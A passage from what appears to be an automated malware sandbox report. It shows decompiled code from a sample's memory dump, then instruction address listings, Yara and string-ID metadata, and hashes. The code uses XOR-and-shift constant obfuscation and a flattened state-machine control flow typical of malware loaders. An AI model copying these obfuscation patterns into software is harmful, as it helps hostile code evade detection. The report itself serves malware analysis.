				signed int _v248;
				signed int _v252;
				signed int _v256;
				signed int _v260;
				signed int _v264;
				signed int _v268;
				signed int _v272;
				signed int _v276;
				signed int _v280;
				signed int _v284;
				signed int _v288;
				signed int _v292;
				signed int _v296;
				signed int _v300;
				signed int _v304;
				signed int _v308;
				signed int _v312;
				signed int _v316;
				signed int _v320;
				signed int _v324;
				signed int _v328;
				signed int _v332;
				signed int _v336;
				signed int _v340;
				signed int _v344;
				signed int _v348;
				signed int _v352;
				signed int _v356;
				signed int _v360;
				signed int _v364;
				signed int _v368;
				signed int _v372;
				signed int _v376;
				signed int _v380;
				signed int _v384;
				signed int _v388;
				signed int _v392;
				signed int _v396;
				signed int _v400;
				signed int _v404;
				signed int _v408;
				signed int _v412;
				signed int _v416;
				signed int _v420;
				signed int _v424;
				signed int _v428;
				signed int _v432;
				void* _t756;
				void* _t757;
				void* _t759;
				void* _t766;
				void* _t775;
				void* _t777;
				void* _t779;
				char _t780;
				void* _t783;
				void* _t788;
				signed int _t794;
				signed int _t795;
				signed int _t796;
				signed int _t797;
				signed int _t798;
				signed int _t799;
				signed int _t800;
				signed int _t801;
				signed int _t802;
				signed int _t803;
				signed int _t804;
				void* _t805;
				void* _t831;
				void* _t867;
				void* _t888;
				signed int _t890;
				signed int _t891;
				void* _t892;
				void* _t896;
				void* _t897;
				void* _t899;
				void* _t902;

				_v92 = 0x6a655a;
				_v96 = __ecx;
				asm("stosd");
				_t890 = 0x46;
				asm("stosd");
				_t896 = 0;
				_t794 = 0x14;
				_t788 = 0x6b38845;
				asm("stosd");
				_v200 = 0x9666ef;
				_v200 = _v200 ^ 0x24560381;
				_v200 = _v200 ^ 0x24c0656e;
				_v392 = 0x2bbe5e;
				_v392 = _v392 << 4;
				_v392 = _v392 ^ 0x74c8326b;
				_v392 = _v392 / _t890;
				_v392 = _v392 ^ 0x01b1329f;
				_v284 = 0x4b28c5;
				_v284 = _v284 << 9;
				_v284 = _v284 + 0xffff1ae6;
				_v284 = _v284 ^ 0x9650a4e6;
				_v244 = 0xb0e026;
				_v244 = _v244 / _t794;
				_v244 = _v244 >> 0xd;
				_v244 = _v244 ^ _t890;
				_v160 = 0x7e7851;
				_t41 =  &_v160; // 0x7e7851
				_t891 = 0x21;
				_v160 =  *_t41 / _t891;
				_v160 = _v160 ^ 0x0003d519;
				_v368 = 0xb104a1;
				_t795 = 0x51;
				_v368 = _v368 / _t795;
				_v368 = _v368 >> 1;
				_t796 = 0x6f;
				_v368 = _v368 / _t796;
				_v368 = _v368 ^ 0x00000285;
				_v316 = 0x387e5;
				_v316 = _v316 + 0xffff69ce;
				_v316 = _v316 + 0x4c7c;
				_v316 = _v316 ^ 0x00033e2f;
				_v356 = 0x4c72a9;
				_v356 = _v356 << 0xb;
				_v356 = _v356 + 0x75e5;
				_v356 = _v356 ^ 0x3a51d26c;
				_v356 = _v356 ^ 0x59c46f89;
				_v416 = 0x3106bc;
				_v416 = _v416 | 0x4bdd89b8;
				_v416 = _v416 + 0xffff59cb;
				_v416 = _v416 ^ 0x45ebab58;
				_v416 = _v416 ^ 0x0e1742df;
				_v408 = 0xe4e21d;
				_v408 = _v408 + 0x41c9;
				_v408 = _v408 + 0xffffceea;
				_v408 = _v408 >> 3;
				_v408 = _v408 ^ 0x001c9e5a;
				_v312 = 0xbaac90;
				_v312 = _v312 | 0x0f8421e4;
				_v312 = _v312 ^ 0x27b39492;
				_v312 = _v312 ^ 0x280d3966;
				_v352 = 0xe996e6;
				_v352 = _v352 ^ 0xda5b0707;
				_v352 = _v352 + 0xffff09bb;
				_v352 = _v352 + 0xffff1acb;
				_v352 = _v352 ^ 0xdab0b667;
				_v288 = 0xd96555;
				_v288 = _v288 ^ 0x489ae580;
				_t797 = 0x25;
				_v288 = _v288 * 0x7a;
				_v288 = _v288 ^ 0x702b0b9a;
				_v128 = 0xcc4c9e;
				_v128 = _v128 ^ 0x36280e35;
				_v128 = _v128 ^ 0x36eb8fbe;
				_v296 = 0xf43a7b;
				_v296 = _v296 * 0x6e;
				_v296 = _v296 + 0xffffe0a1;
				_v296 = _v296 ^ 0x68f04a04;
				_v120 = 0xe04b3a;
				_t136 =  &_v120; // 0xe04b3a
				_v120 =  *_t136 * 0x39;
				_v120 = _v120 ^ 0x31f6dcc4;
				_v280 = 0xc2590;
				_v280 = _v280 / _t797;
				_t798 = 0x50;
				_v280 = _v280 * 0x4e;
				_v280 = _v280 ^ 0x00101627;
				_v148 = 0x1749f;
				_v148 = _v148 << 8;
				_v148 = _v148 ^ 0x017a8570;
				_v184 = 0xe8f483;
				_v184 = _v184 + 0xffff6ca6;
				_v184 = _v184 ^ 0x00ea3c70;
				_v192 = 0x6adbc4;
				_v192 = _v192 / _t798;
				_v192 = _v192 ^ 0x0001675e;
				_v272 = 0x34a752;
				_v272 = _v272 + 0xffff24c3;
				_v272 = _v272 | 0x6b4c91bc;
				_v272 = _v272 ^ 0x6b7105bd;
				_v248 = 0x62e7a0;
				_v248 = _v248 ^ 0x3f642788;
				_t799 = 0x6e;
				_v248 = _v248 * 0x68;
				_v248 = _v248 ^ 0x9abf14c2;
				_v176 = 0x9420ee;
				_v176 = _v176 / _t799;
				_v176 = _v176 ^ 0x000615dd;
				_v256 = 0x2eb359;
				_v256 = _v256 ^ 0xaf20e1f9;
				_v256 = _v256 + 0xffff3dd2;
				_v256 = _v256 ^ 0xaf0f27e0;
				_v264 = 0x5a208f;
				_v264 = _v264 * 0x52;
				_v264 = _v264 ^ 0x9d084573;
				_v264 = _v264 ^ 0x81d5152e;
				_v168 = 0x69c0de;
				_v168 = _v168 | 0x4bf1e754;
				_v168 = _v168 ^ 0x4bf0828f;
				_v232 = 0x31b0a3;
				_v232 = _v232 | 0xd5494fc2;
				_v232 = _v232 ^ 0x4946f5cc;
				_v232 = _v232 ^ 0x9c324e1f;
				_v384 = 0x31488e;
				_t800 = 0x69;
				_v384 = _v384 * 0xf;
				_t801 = 0x66;
				_v384 = _v384 / _t800;
				_v384 = _v384 + 0xffff35c6;
				_v384 = _v384 ^ 0x000ae164;
				_v240 = 0x63a742;
				_v240 = _v240 + 0x7e1;
				_v240 = _v240 + 0x97bd;
				_v240 = _v240 ^ 0x006ce62a;
				_v228 = 0xd33ddb;
				_v228 = _v228 + 0x4206;
				_v228 = _v228 + 0xad1;
				_v228 = _v228 ^ 0x00d02197;
				_v172 = 0x5b6a97;
				_v172 = _v172 * 0x6f;
				_v172 = _v172 ^ 0x27a557a2;
				_v396 = 0xe0b5e3;
				_v396 = _v396 << 2;
				_v396 = _v396 >> 8;
				_v396 = _v396 + 0x2bd4;
				_v396 = _v396 ^ 0x00086263;
				_v292 = 0xf80f19;
				_v292 = _v292 ^ 0x8502a1e4;
				_v292 = _v292 >> 4;
				_v292 = _v292 ^ 0x085dbbb6;
				_v336 = 0x857240;
				_v336 = _v336 + 0xffffa8de;
				_v336 = _v336 >> 0xb;
				_v336 = _v336 ^ 0x000836d2;
				_v376 = 0xac3a78;
				_v376 = _v376 << 4;
				_v376 = _v376 ^ 0x33e24ce3;
				_v376 = _v376 << 0x10;
				_v376 = _v376 ^ 0xeb65b445;
				_v344 = 0x5c371f;
				_v344 = _v344 >> 0xd;
				_v344 = _v344 | 0xeacfcfde;
				_v344 = _v344 ^ 0xeac9349c;
				_v204 = 0xbf5d95;
				_v204 = _v204 ^ 0xaa3abb38;
				_v204 = _v204 ^ 0xaa8d0089;
				_v224 = 0x296818;
				_v224 = _v224 + 0xffffcd0c;
				_v224 = _v224 << 0xf;
				_v224 = _v224 ^ 0x9a9e0707;
				_v420 = 0x2ce410;
				_v420 = _v420 + 0xffff87c9;
				_v420 = _v420 + 0xffff9f9b;
				_v420 = _v420 + 0x8d8a;
				_v420 = _v420 ^ 0x00236d08;
				_v260 = 0x52ff63;
				_v260 = _v260 << 3;
				_v260 = _v260 + 0xffffd91d;
				_v260 = _v260 ^ 0x029ba434;
				_v208 = 0xb8fe1d;
				_v208 = _v208 >> 8;
				_t802 = 0xe;
				_v208 = _v208 / _t801;
				_v208 = _v208 ^ 0x000a9b9e;
				_v324 = 0x6c1c79;
				_v324 = _v324 ^ 0xb363f955;
				_v324 = _v324 ^ 0x8e9acb62;
				_v324 = _v324 ^ 0x3d993b66;
				_v216 = 0xe9d33f;
				_v216 = _v216 / _t802;
				_v216 = _v216 >> 0xf;
				_v216 = _v216 ^ 0x0000327a;
				_v332 = 0x9f1132;
				_v332 = _v332 * 0x4d;
				_v332 = _v332 + 0xffffcaaa;
				_v332 = _v332 ^ 0x2fde1ae3;
				_v196 = 0xb122c7;
				_v196 = _v196 << 8;
				_v196 = _v196 ^ 0xb124a0ca;
				_v188 = 0xb903fa;
				_v188 = _v188 + 0xffff354e;
				_v188 = _v188 ^ 0x00b9d945;
				_v140 = 0x44fc40;
				_v140 = _v140 + 0xd4d;
				_v140 = _v140 ^ 0x0049b242;
				_v308 = 0xf6165e;
				_v308 = _v308 | 0x71aa2658;
				_v308 = _v308 * 0x6b;
				_v308 = _v308 ^ 0xa54f1364;
				_v180 = 0x4d5695;
				_v180 = _v180 ^ 0x6e37bae2;
				_v180 = _v180 ^ 0x6e77cc18;
				_v220 = 0x12bce5;
				_v220 = _v220 ^ 0xee96e214;
				_v220 = _v220 ^ 0x41031b17;
				_v220 = _v220 ^ 0xaf80e24c;
				_v124 = 0x78b997;
				_v124 = _v124 ^ 0x3f24504b;
				_v124 = _v124 ^ 0x3f554dd0;
				_v412 = 0x15645e;
				_v412 = _v412 >> 2;
				_v412 = _v412 | 0x19a57d1e;
				_v412 = _v412 << 2;
				_v412 = _v412 ^ 0x669f8c64;
				_v268 = 0x51234f;
				_v268 = _v268 + 0x36e7;
				_v268 = _v268 * 0x28;
				_v268 = _v268 ^ 0x0cb0ba42;
				_v144 = 0x8ef1eb;
				_v144 = _v144 + 0xd9b4;
				_v144 = _v144 ^ 0x008a4224;
				_v212 = 0xa5d17b;
				_v212 = _v212 << 4;
				_v212 = _v212 ^ 0xd39094ce;
				_v212 = _v212 ^ 0xd9c4358e;
				_v136 = 0x5dab53;
				_v136 = _v136 ^ 0xb3b675ea;
				_v136 = _v136 ^ 0xb3ef4e4d;
				_v164 = 0xa2d424;
				_v164 = _v164 + 0xd184;
				_v164 = _v164 ^ 0x00a6948b;
				_v320 = 0x46a4a2;
				_v320 = _v320 >> 0xb;
				_v320 = _v320 ^ 0xed63e9e3;
				_v320 = _v320 ^ 0xed6e6ace;
				_v236 = 0x5cdda7;
				_v236 = _v236 + 0xa167;
				_v236 = _v236 + 0xffff89e9;
				_v236 = _v236 ^ 0x00505320;
				_v424 = 0x7dc028;
				_v424 = _v424 | 0xc802eae8;
				_v424 = _v424 >> 4;
				_v424 = _v424 | 0x1c9bbcfa;
				_v424 = _v424 ^ 0x1c9a546c;
				_v304 = 0xe00dbe;
				_v304 = _v304 + 0xffff7894;
				_v304 = _v304 | 0x1518f723;
				_v304 = _v304 ^ 0x15de424d;
				_v156 = 0xcaf152;
				_v156 = _v156 * 0x17;
				_v156 = _v156 ^ 0x12317468;
				_v400 = 0x702312;
				_v400 = _v400 + 0xffff8a08;
				_t803 = 0x29;
				_v400 = _v400 / _t803;
				_v400 = _v400 ^ 0x8aedd9ac;
				_v400 = _v400 ^ 0x8ae99a2e;
				_v348 = 0xfd00be;
				_v348 = _v348 ^ 0x254b20e2;
				_v348 = _v348 + 0xffff4fd4;
				_v348 = _v348 ^ 0x25bcd5e4;
				_v340 = 0x15057b;
				_v340 = _v340 + 0xffff3cfe;
				_v340 = _v340 ^ 0xf2bf9676;
				_v340 = _v340 ^ 0xf2a06c3f;
				_v388 = 0xf80b42;
				_v388 = _v388 | 0x6e0aefd1;
				_v388 = _v388 >> 0xd;
				_v388 = _v388 ^ 0x56e72cd3;
				_v388 = _v388 ^ 0x56e22de1;
				_v428 = 0xf44d53;
				_v428 = _v428 >> 8;
				_v428 = _v428 >> 5;
				_v428 = _v428 | 0x0c86e395;
				_v428 = _v428 ^ 0x0c85f464;
				_v252 = 0xa11dfc;
				_v252 = _v252 >> 5;
				_v252 = _v252 + 0x2f65;
				_v252 = _v252 ^ 0x000663de;
				_v364 = 0x3fd805;
				_v364 = _v364 + 0xffff75e6;
				_v364 = _v364 + 0xffff88df;
				_v364 = _v364 | 0x6edac8cb;
				_v364 = _v364 ^ 0x6effa0a8;
				_v132 = 0x1ff9d9;
				_v132 = _v132 << 0xf;
				_v132 = _v132 ^ 0xfcedd5a3;
				_v404 = 0x40578a;
				_t804 = 0x1a;
				_v404 = _v404 * 0x2b;
				_v404 = _v404 >> 0xb;
				_v404 = _v404 | 0xf7d711dc;
				_v404 = _v404 ^ 0xf7ddf608;
				_v380 = 0x99a7f5;
				_v380 = _v380 * 0x17;
				_v380 = _v380 >> 0xa;
				_v380 = _v380 + 0xffff02e7;
				_v380 = _v380 ^ 0x00028ade;
				_v300 = 0xa5bd5a;
				_v300 = _v300 ^ 0x487cada1;
				_v300 = _v300 / _t804;
				_v300 = _v300 ^ 0x02cd6e95;
				_v276 = 0x109f58;
				_v276 = _v276 + 0xffff6b97;
				_v276 = _v276 | 0x8ed672c3;
				_v276 = _v276 ^ 0x8ed38b05;
				_v432 = 0x269f3d;
				_v432 = _v432 << 7;
				_v432 = _v432 >> 0xd;
				_v432 = _v432 >> 7;
				_v432 = _v432 ^ 0x00051bd1;
				_v372 = 0x954f50;
				_v372 = _v372 / _t891;
				_v372 = _v372 >> 1;
				_v372 = _v372 ^ 0xc9264516;
				_v372 = _v372 ^ 0xc925eff0;
				_v328 = 0x78b98e;
				_v328 = _v328 | 0x1d96f0ac;
				_v328 = _v328 * 0x54;
				_v328 = _v328 ^ 0xd7a7266b;
				_v152 = 0xa4a604;
				_v152 = _v152 + 0x2678;
				_v152 = _v152 ^ 0x00a06680;
				_t892 = 0x5467895;
				_v360 = 0xb67e06;
				_t888 = 0xdca4c76;
				_v360 = _v360 + 0xfffffb89;
				_v360 = _v360 + 0xd3dd;
				_v360 = _v360 + 0xffff2e0b;
				_v360 = _v360 ^ 0x00bb2c33;
				while(1) {
					L1:
					_t805 = 0xc44443f;
					while(1) {
						L2:
						_t756 = 0xb2c3b3d;
						_t867 = 0xa0c1eae;
						do {
							while(1) {
								L3:
								_t902 = _t788 - _t756;
								if(_t902 > 0) {
									break;
								}
								if(_t902 == 0) {
									_v104 = 0x100;
									_t775 = E001D2D1D(_v284, _v228, 0x100,  &_v116, _v172, _v396, _v112, _v292);
									_t897 = _t897 + 0x18;
									__eflags = _t775 - _v244;
									_t805 = 0xc44443f;
									_t788 =  ==  ? 0xc44443f : 0xfbf5f53;
									goto L2;
								} else {
									if(_t788 == 0xdb0117) {
										E001DB1A5(_v252, _v364, _v100, _v132);
										_t788 = 0x83c26da;
										while(1) {
											L1:
											_t805 = 0xc44443f;
											goto L2;
										}
									} else {
										if(_t788 == _t892) {
											_t777 = E001DEDED(_v100);
											_t788 = 0xdb0117;
											__eflags = _t777;
											_t896 =  !=  ? 1 : _t896;
											while(1) {
												L1:
												_t805 = 0xc44443f;
												goto L2;
											}
										} else {
											if(_t788 == 0x6b38845) {
												_t788 = 0xce9f3c5;
												continue;
											} else {
												if(_t788 == 0x83c26da) {
													E001E2D18(_v404, _v380, _v300, _v108);
													_t788 = _t888;
													while(1) {
														L1:
														_t805 = 0xc44443f;
														goto L2;
													}
												} else {
													if(_t788 == 0x9c5cad5) {
														_push(_v420);
														_push(_v224);
														_t779 = E001DCD35(0x1c12a0, _v204, __eflags);
														_t893 = _t779;
														_t780 = 0x48;
														_v104 = _t780;
														_t783 = E001DDAC1(_v116, _v260, _v316,  &_v104, _v208, _v324, _v216, _v332, _v196,  &_v76, _t779, _t780);
														_t899 = _t897 + 0x34;
														__eflags = _t783 - _v356;
														if(_t783 != _v356) {
															_t788 = _t888;
														} else {
															E001E2C81(_v188,  &_v68, _v140,  *0x1e5220, _v308, 0x40);
															_t899 = _t899 + 0x10;
															_t788 = 0xd6124b9;
														}
														E001D629F(_v180, _t893, _v220, _v124, _v412);
														L16:
														_t897 = _t899 + 0xc;
														L17:
														_t892 = 0x5467895;
														L36:
														_t867 = 0xa0c1eae;
														_t805 = 0xc44443f;
														_t756 = 0xb2c3b3d;
														goto L37;
													} else {
														if(_t788 != _t867) {
															goto L37;
														} else {
															_t614 =  &_v116; // 0x6a655a
															E001C7460(_v340, _v108,  &_v100, _v312,  *_t614, _v388, _v428);
															_t897 = _t897 + 0x14;
															_t788 =  ==  ? _t892 : 0x83c26da;
															while(1) {
																L1:
																_t805 = 0xc44443f;
																L2:
																_t756 = 0xb2c3b3d;
																_t867 = 0xa0c1eae;
																goto L3;
															}
														}
													}
												}
											}
										}
									}
								}
								L29:
								return _t896;
							}
							__eflags = _t788 - _t805;
							if(_t788 == _t805) {
								_t709 =  &_v116; // 0x6a655a
								_t757 = E001D3C24(_v336, _v376,  *_t709, _v160, _v344);
								_t897 = _t897 + 0xc;
								__eflags = _t757 - _v368;
								if(__eflags != 0) {
									_t788 = _t888;
									goto L36;
								} else {
									_t788 = 0x9c5cad5;
									goto L1;
								}
							} else {
								__eflags = _t788 - 0xce9f3c5;
								if(__eflags == 0) {
									_push(_v296);
									_push(_v128);
									_t759 = E001DCD35(0x1c1360, _v288, __eflags);
									_push(_v148);
									_push(_v280);
									__eflags = E001DD96C(_v184, _v192,  &_v112, _v200, _v272, E001DCD35(0x1c1250, _v120, __eflags), _t759) - _v392;
									_t788 =  ==  ? 0xb2c3b3d : 0x2504c9b;
									E001D629F(_v248, _t759, _v176, _v256, _v264);
									_t899 = _t897 + 0x30;
									E001D629F(_v168, _t760, _v232, _v384, _v240);
									_t888 = 0xdca4c76;
									goto L16;
								} else {
									__eflags = _t788 - 0xd6124b9;
									if(__eflags == 0) {
										_push(_v212);
										_push(_v144);
										_t766 = E001DCD35(0x1c12a0, _v268, __eflags);
										_pop(_t831);
										_t671 =  &_v108; // 0x6a655a
										__eflags = E001D9F1C(_v136,  *_v96, _t831,  *((intOrPtr*)(_v96 + 4)), _v164, _v112, _v416, _v320, _t766, _v236, _v424, _t671) - _v408;
										_t684 =  &_v156; // 0x6a655a
										_t788 =  ==  ? 0xa0c1eae : _t888;
										E001D629F(_v304, _t766,  *_t684, _v400, _v348);
										_t897 = _t897 + 0x34;
										goto L17;
									} else {
										__eflags = _t788 - _t888;
										if(_t788 == _t888) {
											E001E2D18(_v276, _v432, _v372, _v116);
											_t788 = 0xfbf5f53;
											while(1) {
												L1:
												_t805 = 0xc44443f;
												goto L2;
											}
										} else {
											__eflags = _t788 - 0xfbf5f53;
											if(_t788 != 0xfbf5f53) {
												goto L37;
											} else {
												E001D4827(_v112, _v328, _v352, _v152, _v360);
											}
										}
									}
								}
							}
							goto L29;
							L37:
							__eflags = _t788 - 0x2504c9b;
						} while (__eflags != 0);
						goto L29;
					}
				}
			}




























































































































                          0x001d744b
                          0x001d7463
                          0x001d746a
                          0x001d746f
                          0x001d7472
                          0x001d7473
                          0x001d7475
                          0x001d7478
                          0x001d747d
                          0x001d747e
                          0x001d7489
                          0x001d7494
                          0x001d749f
                          0x001d74a7
                          0x001d74ac
                          0x001d74bc
                          0x001d74c0
                          0x001d74c8
                          0x001d74d3
                          0x001d74db
                          0x001d74e6
                          0x001d74f1
                          0x001d7507
                          0x001d750e
                          0x001d7516
                          0x001d751d
                          0x001d7528
                          0x001d752f
                          0x001d7534
                          0x001d753d
                          0x001d7548
                          0x001d7554
                          0x001d7559
                          0x001d755f
                          0x001d7567
                          0x001d756a
                          0x001d756e
                          0x001d7576
                          0x001d7581
                          0x001d758c
                          0x001d7597
                          0x001d75a2
                          0x001d75aa
                          0x001d75af
                          0x001d75b7
                          0x001d75bf
                          0x001d75c7
                          0x001d75cf
                          0x001d75d7
                          0x001d75df
                          0x001d75e7
                          0x001d75ef
                          0x001d75f7
                          0x001d75ff
                          0x001d7607
                          0x001d760c
                          0x001d7614
                          0x001d7621
                          0x001d762c
                          0x001d7637
                          0x001d7642
                          0x001d764a
                          0x001d7652
                          0x001d765a
                          0x001d7662
                          0x001d766a
                          0x001d7675
                          0x001d768a
                          0x001d768d
                          0x001d7694
                          0x001d769f
                          0x001d76aa
                          0x001d76b5
                          0x001d76c0
                          0x001d76d3
                          0x001d76da
                          0x001d76e5
                          0x001d76f0
                          0x001d76fb
                          0x001d7703
                          0x001d770a
                          0x001d7715
                          0x001d772b
                          0x001d773a
                          0x001d773d
                          0x001d7744
                          0x001d774f
                          0x001d775a
                          0x001d7762
                          0x001d776d
                          0x001d7778
                          0x001d7783
                          0x001d778e
                          0x001d77a4
                          0x001d77ab
                          0x001d77b6
                          0x001d77c1
                          0x001d77cc
                          0x001d77d7
                          0x001d77e2
                          0x001d77ed
                          0x001d7800
                          0x001d7801
                          0x001d7808
                          0x001d7813
                          0x001d7827
                          0x001d782e
                          0x001d7839
                          0x001d7844
                          0x001d784f
                          0x001d785a
                          0x001d7865
                          0x001d7878
                          0x001d787f
                          0x001d788a
                          0x001d7895
                          0x001d78a0
                          0x001d78ab
                          0x001d78b6
                          0x001d78c1
                          0x001d78cc
                          0x001d78d9
                          0x001d78e4
                          0x001d78f3
                          0x001d78f6
                          0x001d7900
                          0x001d7901
                          0x001d7907
                          0x001d790f
                          0x001d7917
                          0x001d7922
                          0x001d792d
                          0x001d7938
                          0x001d7943
                          0x001d794e
                          0x001d7959
                          0x001d7964
                          0x001d796f
                          0x001d7984
                          0x001d798b
                          0x001d7996
                          0x001d799e
                          0x001d79a3
                          0x001d79a8
                          0x001d79b0
                          0x001d79b8
                          0x001d79c3
                          0x001d79ce
                          0x001d79d6
                          0x001d79e1
                          0x001d79e9
                          0x001d79f1
                          0x001d79f6
                          0x001d79fe
                          0x001d7a06
                          0x001d7a0b
                          0x001d7a13
                          0x001d7a18
                          0x001d7a20
                          0x001d7a28
                          0x001d7a2d
                          0x001d7a35
                          0x001d7a3d
                          0x001d7a48
                          0x001d7a53
                          0x001d7a5e
                          0x001d7a69
                          0x001d7a74
                          0x001d7a7c
                          0x001d7a87
                          0x001d7a8f
                          0x001d7a97
                          0x001d7a9f
                          0x001d7aa7
                          0x001d7aaf
                          0x001d7aba
                          0x001d7ac2
                          0x001d7acd
                          0x001d7ad8
                          0x001d7ae3
                          0x001d7af4
                          0x001d7af5
                          0x001d7afc
                          0x001d7b07
                          0x001d7b12
                          0x001d7b1d
                          0x001d7b28
                          0x001d7b35
                          0x001d7b49
                          0x001d7b50
                          0x001d7b58
                          0x001d7b63
                          0x001d7b70
                          0x001d7b74
                          0x001d7b7c
                          0x001d7b84
                          0x001d7b8f
                          0x001d7b97
                          0x001d7ba2
                          0x001d7bad
                          0x001d7bb8
                          0x001d7bc3
                          0x001d7bce
                          0x001d7bd9
                          0x001d7be4
                          0x001d7bef
                          0x001d7c02
                          0x001d7c09
                          0x001d7c14
                          0x001d7c1f
                          0x001d7c2a
                          0x001d7c35
                          0x001d7c40
                          0x001d7c4b
                          0x001d7c56
                          0x001d7c61
                          0x001d7c6c
                          0x001d7c77
                          0x001d7c82
                          0x001d7c8a
                          0x001d7c8f
                          0x001d7c97
                          0x001d7c9c
                          0x001d7ca4
                          0x001d7caf
                          0x001d7cc2
                          0x001d7cc9
                          0x001d7cd4
                          0x001d7cdf
                          0x001d7cea
                          0x001d7cf5
                          0x001d7d00
                          0x001d7d08
                          0x001d7d13
                          0x001d7d1e
                          0x001d7d29
                          0x001d7d34
                          0x001d7d3f
                          0x001d7d4a
                          0x001d7d55
                          0x001d7d60
                          0x001d7d6b
                          0x001d7d73
                          0x001d7d7e
                          0x001d7d89
                          0x001d7d94
                          0x001d7d9f
                          0x001d7daa
                          0x001d7db5
                          0x001d7dbd
                          0x001d7dc5
                          0x001d7dca
                          0x001d7dd2
                          0x001d7dda
                          0x001d7de5
                          0x001d7df0
                          0x001d7dfb
                          0x001d7e06
                          0x001d7e19
                          0x001d7e20
                          0x001d7e2b
                          0x001d7e33
                          0x001d7e43
                          0x001d7e48
                          0x001d7e4c
                          0x001d7e54
                          0x001d7e5c
                          0x001d7e64
                          0x001d7e6c
                          0x001d7e74
                          0x001d7e7c
                          0x001d7e84
                          0x001d7e8c
                          0x001d7e94
                          0x001d7e9c
                          0x001d7ea4
                          0x001d7eac
                          0x001d7eb1
                          0x001d7eb9
                          0x001d7ec1
                          0x001d7ec9
                          0x001d7ece
                          0x001d7ed3
                          0x001d7edb
                          0x001d7ee3
                          0x001d7eee
                          0x001d7ef6
                          0x001d7f01
                          0x001d7f0c
                          0x001d7f14
                          0x001d7f1c
                          0x001d7f24
                          0x001d7f2c
                          0x001d7f34
                          0x001d7f3f
                          0x001d7f47
                          0x001d7f52
                          0x001d7f61
                          0x001d7f62
                          0x001d7f66
                          0x001d7f6b
                          0x001d7f73
                          0x001d7f7b
                          0x001d7f88
                          0x001d7f8c
                          0x001d7f91
                          0x001d7f99
                          0x001d7fa1
                          0x001d7fac
                          0x001d7fc2
                          0x001d7fc9
                          0x001d7fd4
                          0x001d7fdf
                          0x001d7fea
                          0x001d7ff5
                          0x001d8000
                          0x001d8008
                          0x001d800d
                          0x001d8012
                          0x001d8017
                          0x001d801f
                          0x001d802d
                          0x001d8031
                          0x001d8035
                          0x001d803d
                          0x001d8045
                          0x001d804d
                          0x001d805a
                          0x001d805e
                          0x001d8066
                          0x001d8071
                          0x001d807c
                          0x001d8087
                          0x001d808c
                          0x001d8094
                          0x001d8099
                          0x001d80a1
                          0x001d80a9
                          0x001d80b1
                          0x001d80b9
                          0x001d80b9
                          0x001d80b9
                          0x001d80be
                          0x001d80be
                          0x001d80be
                          0x001d80c3
                          0x001d80c8
                          0x001d80c8
                          0x001d80c8
                          0x001d80c8
                          0x001d80ca
                          0x00000000
                          0x00000000
                          0x001d80d0
                          0x001d82c7
                          0x001d82e9
                          0x001d82f5
                          0x001d82f8
                          0x001d82ff
                          0x001d8304
                          0x00000000
                          0x001d80d6
                          0x001d80dc
                          0x001d829c
                          0x001d82a3
                          0x001d80b9
                          0x001d80b9
                          0x001d80b9
                          0x00000000
                          0x001d80b9
                          0x001d80e2
                          0x001d80e4
                          0x001d826c
                          0x001d8273
                          0x001d8279
                          0x001d827b
                          0x001d80b9
                          0x001d80b9
                          0x001d80b9
                          0x00000000
                          0x001d80b9
                          0x001d80ea
                          0x001d80f0
                          0x001d825b
                          0x00000000
                          0x001d80f6
                          0x001d80fc
                          0x001d824d
                          0x001d8254
                          0x001d80b9
                          0x001d80b9
                          0x001d80b9
                          0x00000000
                          0x001d80b9
                          0x001d8102
                          0x001d8108
                          0x001d8155
                          0x001d815e
                          0x001d816c
                          0x001d8173
                          0x001d8175
                          0x001d8178
                          0x001d81c7
                          0x001d81cc
                          0x001d81cf
                          0x001d81d3
                          0x001d8208
                          0x001d81d5
                          0x001d81f9
                          0x001d81fe
                          0x001d8201
                          0x001d8201
                          0x001d8225
                          0x001d822a
                          0x001d822a
                          0x001d822d
                          0x001d822d
                          0x001d853c
                          0x001d853c
                          0x001d8541
                          0x001d8546
                          0x00000000
                          0x001d810a
                          0x001d810c
                          0x00000000
                          0x001d8112
                          0x001d8121
                          0x001d813e
                          0x001d8143
                          0x001d814d
                          0x001d80b9
                          0x001d80b9
                          0x001d80b9
                          0x001d80be
                          0x001d80be
                          0x001d80c3
                          0x00000000
                          0x001d80c3
                          0x001d80b9
                          0x001d810c
                          0x001d8108
                          0x001d80fc
                          0x001d80f0
                          0x001d80e4
                          0x001d80dc
                          0x001d835f
                          0x001d8369
                          0x001d8369
                          0x001d830c
                          0x001d830e
                          0x001d8514
                          0x001d8522
                          0x001d8527
                          0x001d852a
                          0x001d852e
                          0x001d853a
                          0x00000000
                          0x001d8530
                          0x001d8530
                          0x00000000
                          0x001d8530
                          0x001d8314
                          0x001d8314
                          0x001d831a
                          0x001d8432
                          0x001d843e
                          0x001d844c
                          0x001d8451
                          0x001d845f
                          0x001d84a6
                          0x001d84b4
                          0x001d84d3
                          0x001d84d8
                          0x001d84f6
                          0x001d84fb
                          0x00000000
                          0x001d8320
                          0x001d8320
                          0x001d8326
                          0x001d8391
                          0x001d839d
                          0x001d83ab
                          0x001d83b1
                          0x001d83b4
                          0x001d8407
                          0x001d8414
                          0x001d8422
                          0x001d8425
                          0x001d842a
                          0x00000000
                          0x001d8328
                          0x001d8328
                          0x001d832a
                          0x001d8380
                          0x001d8387
                          0x001d80b9
                          0x001d80b9
                          0x001d80b9
                          0x00000000
                          0x001d80b9
                          0x001d832c
                          0x001d832c
                          0x001d8332
                          0x00000000
                          0x001d8338
                          0x001d8355
                          0x001d835a
                          0x001d8332
                          0x001d832a
                          0x001d8326
                          0x001d831a
                          0x00000000
                          0x001d854b
                          0x001d854b
                          0x001d854b
                          0x00000000
                          0x001d8557
                          0x001d80be

                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.993327606.00000000001C0000.00000040.00000010.sdmp, Offset: 001C0000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: SP$*l$:K$KP$?$M$O#Q$Qx~$Zej$d$e/$f9($p<$x&$z2$|L$ K%$-V$6$L3$u$c
                          • API String ID: 0-4041043011
                          • Opcode ID: 44d5ea027abd601e9a4f244781e4f80fe54eb2e2544c35ffdfe99c6ef77d4f33
                          • Instruction ID: 1f0a94f4963ce9507a42c382ec95a71e29b95488a6b975340f3a2276b2e4a844
                          • Opcode Fuzzy Hash: 44d5ea027abd601e9a4f244781e4f80fe54eb2e2544c35ffdfe99c6ef77d4f33
                          • Instruction Fuzzy Hash: 1B82E1715093808BD7B9CF65C58AB8BBBE2BBD4304F10891DE1CA96260DBB19959CF43
                          Uniqueness

                          Uniqueness Score: -1.00%

